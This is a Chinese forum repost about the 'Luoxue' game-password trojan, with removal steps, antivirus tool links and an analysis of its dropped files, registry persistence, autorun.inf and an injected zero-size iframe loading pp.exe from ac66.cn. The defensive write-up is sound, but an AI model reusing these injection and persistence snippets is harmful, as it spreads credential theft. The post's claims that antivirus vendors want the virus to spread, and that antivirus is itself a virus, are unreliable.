UBLink技術團隊討論區

[門神]

FYI

原文出處

http://forum.taobao.com/forum-7/show_th ... 87185-.htm

前言:这是一个好心的作者.他要大家转发和注意这类流氓网站.所以我在中了两次这个落雪病毒后,转发出来.

以供大家参考.流氓网站发出的病毒天天有新的变种,所有的国内国外的杀毒软件均不能清理,请大家小心为上.

http://www.77my.com/Article_Show.asp?ArticleID=459

写这篇文章是因为本人也感染了该病毒还差点变成该病毒携带者了，深受其害，有感于此，发表该文，以帮助那些无法找到原因的朋友们，希望能为你们带去一些温暖。也不知道是frame里边给下载的病毒还是落雪病毒造成frame嵌入ac66.cn病毒，总之是一些经验和大家分享
注：（本文由小雨沙沙收集并编写，将本页发送给更多的人看,就能帮更多人解决问题）

落雪病毒也称呼为落雪木马，是很厉害的一个病毒，他的厉害在于连正版软件也给他PK掉了，真是可味笑话了。落雪”木马也叫“游戏大盗”（trojanpsw.gamepass），由vb程序语言编写，通过nspack3.1加壳处理

来看看“江民”同志对它的评价: 使用的网络游戏帐号莫名被盗，而且电脑中正在使用的杀毒软件也突然异常终止工作。，多款品牌的杀毒软件都存在被异常终止的现象，而重新启动杀毒软件杀毒后，病毒仍然会出现，屡杀不绝。病毒还修改注册表文件关联，每当用户点击html文件时，都会运行病毒。此外，病毒还在D盘下生成一个自动运行批处理文件，这样即使C盘目录下的病毒文件被清除，当用户打开D盘时，病毒仍然被激活运行。这也是许多用户反映病毒屡杀不绝的原因。

病毒运行后，在C盘program file以及windows目录下生成winlogon.exe、regedit.com等14个病毒文件，病毒文件之多比较少见，，事实上这14个不同文件名的病毒文件系同一种文件，“落雪”之名亦可能由此而来。病毒文件名被模拟成正常的系统工具名称，但是文件扩展名变成了 .com。江民反病毒工程师分析，这是病毒利用了Windows操作系统执行.com文件的优先级比EXE文件高的特性，这样，当用户调用系统配置文件 Msconfig.exe的时候，一般习惯上输入 Msconfig，而这是执行的并不是微软的Msconfig.exe程序，而是病毒文件 Msconfig.com ，病毒作者的“良苦用心”由此可见。病毒另一狡诈之处还有，病毒还创建一名为winlogon.exe的进程，并把 winlogon.exe 的路径指向c:\windows\winlogon.exe，而正常的系统进程路径是C:\WINDOWS\system32\ winlogon.exe，以此达到迷惑用户的目的。

落雪木马还有一个很特别的地方，就是这个木马不仅仅感染C盘，还会在D 盘中也留下木马文件很明显，即便是用户中毒之后将C盘的病毒杀干净了，一旦双击D盘还会重新感染落雪木马，可见这个木马的作者利用了人门很多操作习惯上的漏洞，

可以看出该病毒制造者出于偷盗游戏帐号，QQ帐号，网络密码等的不可告人的目的来策划的散播该病毒的。本人用恢复系统办法才用不到一天又染上了该毒，这才体会到该病毒的严重性，于是下载瑞星2007后查杀掉不少病毒，可是刚刚恢复系统又不能用了，再恢复换上天网防火墙,防是防住了，可没过2天连天网防火墙也给禁用了，说是找不到什么（我忘了，记起来补上）。找来3721的反间谍专家也查杀不了，用N多木马杀手也是杀完后又重现，问题出在哪儿呢？打开我的Dreamweaver软件才发现，新建的htm文件竟然在最后的</html>代码处添加了一个 frame，里边嵌入ac66病毒携带网站，这就是说，每当我新建一个htm或asp网页的话都将变成该病毒携带者了，如果一个站长的电脑中了该毒，那么该站很可能会成为病毒传播新站点了，我查了一下果然不出所料，我最新更新的mail.htm文件里边就带了该病毒，想到刚刚上传的我立即删除掉，并马上修改好了。后怕之余查看网站内其它所有更新文件并没有受害。查看自己电脑中全部的.htm .html .asp三种类型文件都受到感染，太可怕了，经过调查后知道名为落雪木马，最新版正版杀毒软件是可以杀除，但是杀的并不彻底，反而自己倒给病毒杀除了，请看一个站长的自白：http://www.ltell.cn/dispbbs.asp?boardid=6&id=6047&star=1&page=1
也就是说该站也有病毒哦，这样看来该病毒并不亚于“冲击波”病毒造成的伤害了

我的解决问题办法：

A:“落雪”病毒专杀工具下载地址：
http://www.jiangmin.com/download/TrojanKiller.exe

B:下载本站木马杀客，进行查杀：Soft_Show.asp?SoftID=286

c:下载其它查杀工具查杀：
灰鸽子专杀http://dx.mmsk.cn/zs.rar
瑞星专杀http://it.rising.com.cn/Channels/Service/index.shtml
毒霸专杀http://tool.duba.net/zhuansha/
"新娘"病毒专杀工具http://tool.duba.net/zhuansha/23.shtml
文件型病毒＿desktop.ini“维金”病毒专杀http://download.rising.com.cn/zsgj/VirusKiller.scr
“维金”病毒专杀http://it.rising.com.cn/service/technology/RavVikiing.htm

江民专杀介绍：
http://www.jiangmin.com/News/jiangmin/i ... 172130.htm

D:最后用注册表修复工具:修复一下就好了。注册表修复工具:http://down.www.kingsoft.com/db/download/othertools/Duba_RegSolve.EXE

E:接下来，很重要的一步，修复电脑中全部的.htm .html .asp三种类型文件
因为落雪在感染电脑时，把这三种文件的尾部，就加上了一行链接代码，如：
<frame src=http://www.ac66.cn/88/index.htm ........>
这段代码就是导致落雪病毒杀死后，不断幽灵再现的原因，我就被搞了不少于3次
可以用记事本打开自己电脑的htm或html网页文件，看看尾部的这段代码，每当这些文件被IE打开一次，就会再次复发落雪病毒
清除的方法是下载一个文件内容批量替换工具，如：Advanced Find and Replace中文版，把电脑内的全部三种文件的尾部的链接代码都去掉，就OK了
我个人是用Dreamweaver先卸载删除文件夹后再重新安装,用它自带的替换工具将代码替换为空，最后将IE安全里边添加上www.ac66.cn等网址,禁止访问。

F:最好将IE最新补丁打上：http://download.microsoft.com/download/8/5/3/8533e27d-4326-4c1e-9a97-fe9fdb7ea904/q822002.exe
Microsoft下载中心：http://www.microsoft.com/downloads/Browse.aspx?displaylang=zh-cn&categoryid=7
http://download.microsoft.com/download/ ... 86-CHS.exe
http://download.microsoft.com/download/ ... 86-CHS.exe
........
有很多，最好全部打上补丁
其它安全隐患重大漏洞解决方案：http://www.duba.net/c/2003/12/03/101760.shtml
在IE的缺省安全状态下，打开本地的网页文件或邮件会直接下载并运行任意的可执行文件(IE 不会给出任何安全提示)。
如果结合一些木马或其他技巧，可以实现对目标计算机的任意控制或破坏！可能会给蠕虫病毒更加开阔的空间，造成类似 Iframe 漏洞的破坏

IE查找路径选c:\program files\internet explorer\ 注意：请将隐藏的iexplore.com删除（如果有）
建议专杀工具杀完以后用搜索把D盘E盘最新和病毒同时间新建的的exe文件全部删除以免附在别的exe文件上的
个人始终坚持不用杀毒软件，杀毒本身也是病毒，拖慢了我们上网的速度。

解决方法二：

1.结束进程:调出windows务管理器(Ctrl+Alt+Del),发现通过简单的右击当前用户名的 lsass.exe来结束进程是行不通的.会弹出该进程为系统进程无法结束的提醒框;鼠标右键点击"任务栏"，选择"任务管理器"。点击菜单"查看(V) "－>"选择列(S)..."，在弹出的对话框中选择"PID（进程标识符）"，并点击"确定"。找到映象名称为"LSASS.exe"，并且用户名不是"SYSTEM"的一项，记住其PID号.点击"开始"－》“运行”，输入"CMD"，点击"确定"打开命令行控制台。输入"ntsd –c q -p (PID)"，比如我的计算机上就输入"ntsd –c q -p 1064".

2.删除病毒文件:以下要删除的文件大多是隐藏文件所以要首先设置显示所有的隐藏文件、系统文件并显示文件扩展名; 我的电脑-->工具(T)-->文件夹选项(O)...-->查看-->选择"显示所有文件和文件夹",并把隐藏受保护的操作系统文件(推荐)前的勾去掉,这时会弹出一个警告,选择是.至此就显示了所有的隐藏文件了.


删除如下几个文件：

C:\Program Files\Common Files\INTEXPLORE.pif
C:\Program Files\Internet Explorer\INTEXPLORE.com
C:\WINDOWS\EXERT.exe
C:\WINDOWS\IO.SYS.BAK
C:\WINDOWS\LSASS.exe
C:\WINDOWS\Debug\DebugProgram.exe
C:\WINDOWS\system32\dxdiag.com
C:\WINDOWS\system32\MSCONFIG.COM
C:\WINDOWS\system32\regedit.com

在D:盘上点击鼠标右键，选择“打开”。删除掉该分区根目录下的"Autorun.inf"和"command.com"文件.

3.删除注册表中的其他垃圾信息.这个病毒该写的注册表位置相当多，如果不进行修复将会有一些系统功能发生异常。


将Windows目录下的"regedit.exe"改名为"regedit.com"并运行，删除以下项目：
HKEY_CLASSES_ROOT\WindowFiles
HKEY_CURRENT_USER\Software\VB and VBA Program Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
下面的 Check_Associations项
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\INTEXPLORE.pif
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
下面的ToP项

将HKEY_CLASSES_ROOT\.exe的默认值修改为
"exefile"(原来是windowsfile)

将HKEY_CLASSES_ROOT\Applications\iexplore.exe\shell\open\command
的默认值修改为
"C:\Program Files\Internet Explorer\iexplore.exe" %1"
(原来是intexplore.com)

将HKEY_CLASSES_ROOT\CLSID\
\shell\OpenHomePage\Command 的默认值修改为
"C:\Program Files\Internet Explorer\IEXPLORE.EXE"(原来是INTEXPLORE.com)

将HKEY_CLASSES_ROOT \ftp\shell\open\command
和HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command
的默认值修改为"C:\Program Files\Internet Explorer\iexplore.exe" %1"
(原来的值分别是INTEXPLORE.com和INTEXPLORE.pif)

将HKEY_CLASSES_ROOT \htmlfile\shell\open\command
HKEY_CLASSES_ROOT\HTTP\shell\open\command的默认值修改为
"C:\Program Files\Internet Explorer\iexplore.exe" –nohome”

将HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet
的默认值修改为"IEXPLORE.EXE".(原来是INTEXPLORE.pif)

重新将Windows目录下的regedit扩展名改回exe，至此病毒清除成功，注册表修复完毕

江民为什么不直接删除frame的代码呢？为什么不屏蔽该ac66.cn网站呢？可能他们也希望病毒越传越广越好吧，那么杀毒软件不就卖的更欢了吗？可怜的正版杀毒软件就是如此的不勘一击。最后做个大胆猜测这个病毒有可能是****著名网站的内部人员。

=============================
最后付上落雪病毒分析和frame嵌入ac66.cn分析：

病毒运行后，将创建下列文件（以Windows XP 系统为例）：

c:\program files\common files\iexplore.pif, 47274字节
c:\program files\internet explorer\iexplore.com, 47274字节
c:\windows\1.com, 47274字节
c:\windows\debug\debugprogram.exe, 47274字节
c:\windows\exeroute.exe, 47274字节
c:\windows\explorer.com, 47274字节
c:\windows\finder.com, 47274字节
c:\windows\winlogon.exe, 47274字节
c:\windows\System32\command.pif, 47274字节
c:\windows\System32\dxdiag.com, 47274字节
c:\windows\System32\finder.com, 47274字节
c:\windows\System32\msconfig.com, 47274字节
c:\windows\System32\regedit.com, 47274字节
c:\windows\System32\rundll32.com, 47274字节

在注册表中添加下列启动项：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Torjan Program" = %WinDir%\winlogon.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"Shell" = explorer.exe 1

这样，在Windows启动时，病毒就可以自动执行。

病毒通过修改下列注册表键值，改变IE默认主页等信息：

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]

"Check_Associations" = no

病毒通过修改下列注册表键值，修改文件关联：

[HKEY_CLASSES_ROOT\dunfile\shell\open\command]
"" = %systemroot%\system32\rundll32.com netshell.dll,invokedunfile %1

[HKEY_CLASSES_ROOT\file\shell\open\command]
"" = rundll32.com url.dll,fileprotocolhandler %l

[HKEY_CLASSES_ROOT\htmlfile\shell\open\command]
"" = "c:\program files\internet explorer\iexplore.com" -nohome

这样，用户打开任何html文件，都会再次运行病毒程序。

大家可以看到，该木马会生成很多文件，并且文件的大小都是一样的，这可能就是落雪木马名称的由来吧！其实这些文件都是同一个文件，只是文件名称不同而已。生成的病毒文件模拟成正常的工具名称，只是扩展名该成了 .com，这是利用了Windows操作系统执行.com文件的优先级比EXE文件高的特性，当用户调用 Msconfig.exe的时候，一般习惯上输入 Msconfig，而这是执行的并不是微软的Msconfig.exe程序，而是病毒文件 Msconfig.com ，可见病毒作者的“良苦用心”。

落雪木马会创建一个名为winlogon.exe 的进程，这个进程的路径是c:\windows\winlogon.exe，以此来迷惑用户。

落雪木马会创建以下键值实现开机自启动：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Torjan Program"="C:\\WINNT\\WINLOGON.EXE"

落雪木马还有一个很特别的地方，就是这个木马不仅仅感染C盘，还会在D 盘中也留下木马文件autorun.inf 文件是一个自动运行的脚本程序，里面内容如下:

[autorun]
OPEN=D:\pagefile.pif

很明显，即便是用户中毒之后将C盘的病毒杀干净了，一旦双击D盘还会重新感染落雪木马，可见这个木马的作者利用了人门很多操作习惯上的漏洞。

==========================

分析frame嵌入ac66.cn

代码：<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0"（高和宽全是0见不得人） ....../iframe>它的首页已经被人黑了，但是88这个文件夹还在病毒还在散播中,他取名88大概想靠病毒“发发”吧
在IE栏里输入，view-source:http://www.ac66.cn/88/index.htm(解释：view-source是用记事本打开某网站查看源代码，以免中了病毒)得到如下代码

<SCRIPT......

if (cameFrom("163.com"mage.taobao.com/forum/smiles/icon_wink.gif" border=0>) {
location.replace("3721.htm";
.........}
else {
location.replace("mm.htm"; 解释:“用新页面的url替换当前的浏览的历史记录,用replace进入mm.htm页面,从而mm.htm更换当前页面.”
}
.....SCRIPT>

再查看view-source:http://www.ac66.cn/88/mm.htm得到src= "http://www.ac66.cn/88/joke.htm"这个页面和 src='http://s48.cnzz.com/stat.php?id=195662&web_id=195662&show=pic1' 这个统计

再查看view-source:http://www.ac66.cn/88/joke.htm得到加密的代码。。。点编辑，替换用2空格替换成0空格就能看个大概了：dl="http ://www.ac66.cn/88/pp.exe" 直接加载病毒文件pp.exe这个网页标题叫Oh,mygod!..网页名joke.htm,joke是“笑话”意思么。看来这真的是美丽的玩笑了。

病毒的站点统计http://cnzz.com/stat/login.php?web_id=195662
域名 ac66.cn 由 李原科技 注册 注册时间: 2006-06-29 到期时间: 2007-06-29 主名字服务器IP地址:210.51.170.48新网Xinnet.com备案。

参考文献和相关的评论：
微软IE浏览器重大安全隐患的漏洞http://www.duba.net/special/leakspecial/IE_leak/index.shtml
2006年最难对付的木马病毒之一http://baike.baidu.com/view/474890.htm
安全漏洞http://www.duba.net/news/secureleak/
http://bbs.51.la/viewthread.php?tid=231 ... 3D1&page=1
http://forum.taobao.com/forum-27/show_t ... 43994-.htm
http://www.eachnic.com/club/viewthread. ... a=page%3D1
Article_Show.asp?ArticleID=442